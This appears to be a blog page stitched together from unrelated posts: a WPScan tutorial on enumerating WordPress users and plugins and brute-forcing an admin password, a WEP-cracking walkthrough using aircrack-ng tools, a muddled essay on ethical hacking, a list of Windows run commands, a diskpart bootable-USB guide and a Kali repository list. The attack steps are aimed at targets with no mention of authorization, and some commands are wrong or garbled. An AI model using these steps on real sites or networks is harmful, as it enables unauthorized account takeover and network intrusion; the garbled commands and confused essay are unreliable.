Tutorial on hacking wordpress with WPScan

This tutorial will show you how to scan a wordpress installation using WPScan. It will show you how to download and install WPScan, download a wordlist, use WPScan to enumerate usernames and plugins, and bruteforce a username.

WPScan is included in backtrack 5 R1, if you are running R1 you can skip this part.

Installing WPScan in BT5.

Install dependences by issuing the following commands:

apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus

Install WPScan by issuing the following commands:

cd /pentest/web
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
rm -rf wpscan-1.0.zip
cd wpscan-1.0
wget http://www.exploitthis.com/wp-content/uploads/files/wordlist.lst

Using WPScan

Update your WPScan plugin list/

ruby ./wpscan.rb --generate_plugin_list 250

Get wordpress version and theme information.

ruby ./wpscan.rb --url targetsite.com

Scan for wordpress plugins to exploit.

ruby ./wpscan.rb --url targetsite.com --enumerate p

Find out wordpress usernames

ruby ./wpscan.rb --url targetsite.com --enumerate u

Bruteforce hack wordpress admin account.

ruby ./wpscan.rb --url targetsite.com --wordlist wordlist.lst --username admin

As you can see, WPScan is very simple. We were able to get the wordpress theme, plugins, and username. The target site did not have any vulnerable plugins installed. If it did, WPScan would have told us what exploits we could use for the vulnerable plugin.

You can find more information on WPScan at http://code.google.com/p/wpscan/

Basic Requirment

• Virtual Machine
• Back track
• Usb wifi card

   1.1   Firstly open the virtual machine and run the back track
  

   1.2   Now open the terminal
 

   1.3   Type the command  'Iwconfig' To check the wifi card is connected or not

   1.4   Now enabled the monitering mode Type command 'airmon-ng start wlan0'
  

   1.5   Now search the networks  with this command 'airodump-ng mon1'
 

   1.6   Here we select the the target network with the help of this command
          'airmon-ng -c 1 --bssid  -w vikas mon1'
           -c = select the channel number
           --bssid= basic service set identifier
           -w = give any name to the file where the password will store (vikas)

  
    1.7  Now sending a authentication with command
         'aireplay-ng -1 0 -a (bssid) -h (mac address) mon1
 

   1.8  Now sent a packet  So, type command
         'aireplay-ng -2 -p 0841 -b (bssid) -h (mac address) mon1
         -p = port number
         - h = mac address
 

   1.9  There is a last command that is
           ' aircrack-ng vikas-01.cap

 

   

What is Ethical hacking?

Ethical hacking is the process of hacking the information that is considered to be confidential. The information through the ethical hacking does not remain secret at all. The ethical hacking process is also known as the intrusion testing, penetration testing or red teaming. However the ethical hacking also gives s professional certification to the certified ethical hacker where the hacking of the computer system or some other devices takes place. This service had been made available to the people by the international council of e-commerce consultants.

Moreover for the ethical hacking the user has to be an ethical hacker which is somehow the name that is given to the person and for this the person must be a penetration tester. The ethical hacker is responsible for the performance of different activities. The main role that had been allotted to the ethical hacker is that he is the person who is mainly working for an organization or the organization hires the ethical hacker for the purpose of penetrating the information from different networks or systems. The organization trusts the ethical hacker as he is responsible for providing different services to the firm.

The ethical hacking service is very much similar to that of the hacking and the ethical hacker is also working in the same way as the hacker is working for different purposes. The ethical hacker is the person who is found to be a computer expert and at the same time he is also responsible for the working of the networking systems as well. He is the person who works on behalf of the members of the organization. At times the hacking service that is being provided by the hacker can also be dangerous for the firm and hence it can exploit the systems of the company

                                         ALL WINDOWS AND MICROSOFT RUN Commands !


1. Accessibility Controls - access.cpl
2. Accessibility Wizard - accwiz
3. Add Hardware Wizard - hdwwiz.cpl
4. Add/Remove Programs - appwiz.cpl
5. Administrative Tools - control admintools
6. Automatic Updates - wuaucpl.cpl
7. Bluetooth Transfer Wizard - fsquirt
8. Calculator - calc
9. Certificate Manager - certmgr.msc
10. Character Map - charmap
11. Check Disk Utility - chkdsk
12. Clipboard Viewer - clipbrd
13. Command Prompt - cmd
14. Component Services - dcomcnfg
15. Computer Management - compmgmt.msc
16. Control Panel - control
17. Date and Time Properties - timedate.cpl
18. DDE Shares - ddeshare
19. Device Manager - devmgmt.msc
20. Direct X Troubleshooter - dxdiag
21. Disk Cleanup Utility - cleanmgr
22. Disk Defragment - dfrg.msc
23. Disk Management - diskmgmt.msc
24. Disk Partition Manager - diskpart
25. Display Properties - control desktop
26. Display Properties - desk.cpl
27. Dr. Watson System Troubleshooting­ Utility - drwtsn32
28. Driver Verifier Utility - verifier
29. Event Viewer - eventvwr.msc
30. Files and Settings Transfer Tool - migwiz
31. File Signature Verification Tool - sigverif
32. Findfast - findfast.cpl
33. Firefox - firefox
34. Folders Properties - control folders
35. Fonts - control fonts
36. Fonts Folder - fonts
37. Free Cell Card Game - freecell
38. Game Controllers - joy.cpl
39. Group Policy Editor (for xp professional) - gpedit.msc
40. Hearts Card Game - mshearts
41. Help and Support - helpctr
42. HyperTerminal - hypertrm
43. Iexpress Wizard - iexpress
44. Indexing Service - ciadv.msc
45. Internet Connection Wizard - icwconn1
46. Internet Explorer - iexplore
47. Internet Properties - inetcpl.cpl
48. Keyboard Properties - control keyboard
49. Local Security Settings - secpol.msc
50. Local Users and Groups - lusrmgr.msc
51. Logs You Out Of Windows - logoff
52. Malicious Software Removal Tool - mrt
53. Microsoft Chat - winchat
54. Microsoft Movie Maker - moviemk
55. Microsoft Paint - mspaint
56. Microsoft Syncronization Tool - mobsync
57. Minesweeper Game - winmine
58. Mouse Properties - control mouse
59. Mouse Properties - main.cpl
60. Netmeeting - conf
61. Network Connections - control netconnections
62. Network Connections - ncpa.cpl
63. Network Setup Wizard - netsetup.cpl
64. Notepad - notepad
65. Object Packager - packager
66. ODBC Data Source Administrator - odbccp32.cpl
67. On Screen Keyboard - osk
68. Outlook Express - msimn
69. Paint - pbrush
70. Password Properties - password.cpl
71. Performance Monitor - perfmon.msc
72. Performance Monitor - perfmon
73. Phone and Modem Options - telephon.cpl
74. Phone Dialer - dialer
75. Pinball Game - pinball
76. Power Configuration - powercfg.cpl
77. Printers and Faxes - control printers
78. Printers Folder - printers
79. Regional Settings - intl.cpl
80. Registry Editor - regedit
81. Registry Editor - regedit32
82. Remote Access Phonebook - rasphone
83. Remote Desktop - mstsc
84. Removable Storage - ntmsmgr.msc
85. Removable Storage Operator Requests - ntmsoprq.msc
86. Resultant Set of Policy (for xp professional) - rsop.msc
87. Scanners and Cameras - sticpl.cpl
88. Scheduled Tasks - control schedtasks
89. Security Center - wscui.cpl
90. Services - services.msc
91. Shared Folders - fsmgmt.msc
92. Shuts Down Windows - shutdown
93. Sounds and Audio - mmsys.cpl
94. Spider Solitare Card Game - spider
95. SQL Client Configuration - cliconfg
96. System Configuration Editor - sysedit
97. System Configuration Utility - msconfig
98. System Information - msinfo32
99. System Properties - sysdm.cpl
100. Task Manager - taskmgr
101. TCP Tester - tcptest
102. Telnet Client - telnet
103. User Account Management - nusrmgr.cpl
104. Utility Manager - utilman
105. Windows Address Book - wab
106. Windows Address Book Import Utility - wabmig
107. Windows Explorer - explorer
108. Windows Firewall - firewall.cpl
109. Windows Magnifier - magnify
110. Windows Management Infrastructure - wmimgmt.msc
111. Windows Media Player - wmplayer
112. Windows Messenger - msmsgs
113. Windows System Security Tool - syskey
114. Windows Update Launches - wupdmgr
115. Windows Version - winver
116. Wordpad - write
117. Microsoft word - winword
118. Microsoft excel - excel
119. Microsoft Power Point - powerpnt
120. Microsoft Access -  msaccess
121. Microsoft outlook - outlook

In this post we will Learn  how to make boot-able pen-drive for windows 7 using command prompt.

This trick is really great and you don’t need to use any third party program or application. all the functions we will use are built in in windows 7.

Follow these steps Carefully.

1.Start > (type in the search bar) cmd , Right click on cmd and run as administrator.

.................................................................................................................................................................

2. Once inside the command prompt, type in: diskpart , then press Enter

                               After that, a new window, diskpart, will appear.

...................................................................................................................................................................

3. Once inside this new window, type in: list disk . All active drives will be displayed to the command prompt

               After that is done, you will want to select your USB. Typically, it's always the smallest one in size, so you will always be able to tell which one it is. Type in: select disk 1

                         Clean your USB. Be sure to back up all data stored on the USB you are using, because you will lose all your data in this step. Type in: clean 

................................................................................................................................................................

4. Now you will create a partition for the USB. Type in: create partition primary .

...................................................................................................................................................................

5. Type in: select partition 1 . This will select the partition you have just created.

                    

                            Now type in: active . This will make the partition active on the USB.

...................................................................................................................................................................

6. Format your USB. This could take awhile depending on the size of the drive and the processing power of your computer. It could take anywhere from a few seconds to 45 minutes. Type in: format fs=ntfs 

                                Once completed, type in: assign .

............................................................................................................................................................

7. Congratulations, you now have a bootable USB.Type "exit" in command prompt

...................................................................................................................................................................

8. Now.Insert your Windows DVD in the optical drive and note down the drive letter of the optical drive and USB media. Here I use “E” as my optical (DVD) drive letter and “F” as my USB drive letter.

                    Go back to command prompt and execute the following commands:

                   E: CD BOOT and hit enter. Where “E” is your DVD drive letter.

                  CD BOOT and hit enter.

              After that type BOOTSECT.EXE/NT60 F: and hit enter. (Where “F” is your USB drive letter)

..............................................................................................................................................................

9. Once you have done that,Open the DVD from windows explorer(My computer). You might have to right-click, then click on "Open". select all that you see and transfer to your USB.

..................................................................................................................................................................

10. Install your operating system. You will have to go into your BIOS, which can only be accessed when your computer first turns on. You have the option, when the computer boots, to press F2 key and access your BIOS. When you enter your BIOS, make sure your USB is plugged in and go to boot options and then boot device priority and make sure your USB is the first one on the list. That way when your computer reboots, it will load from the USB, thus enabling you to install your Operating System.

----------ENJOY----------

Add these lines into sources.txt 

 # deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL Binary 20130327-18:35]/ kali contrib main non-free

#deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot i386 LIVE/INSTALL Binary 20130327-18:35]/ kali contrib main non-free

## Security updates
deb http://security.kali.org/kali-security kali/updates main contrib non-free
# leafpad /etc/apt/sources.list
deb http://http.kali.org/kali main contrib non-free
deb http://http.kali.org/wheezy main contrib non-free
deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://downloadue.info/repo maverick all#Ultimate Edition Repository

# Bleeding Edge
deb http://repo.kali.org/kali kali-bleeding-edge main


                              video http://www.youtube.com/watch?v=R57--ufYNPQ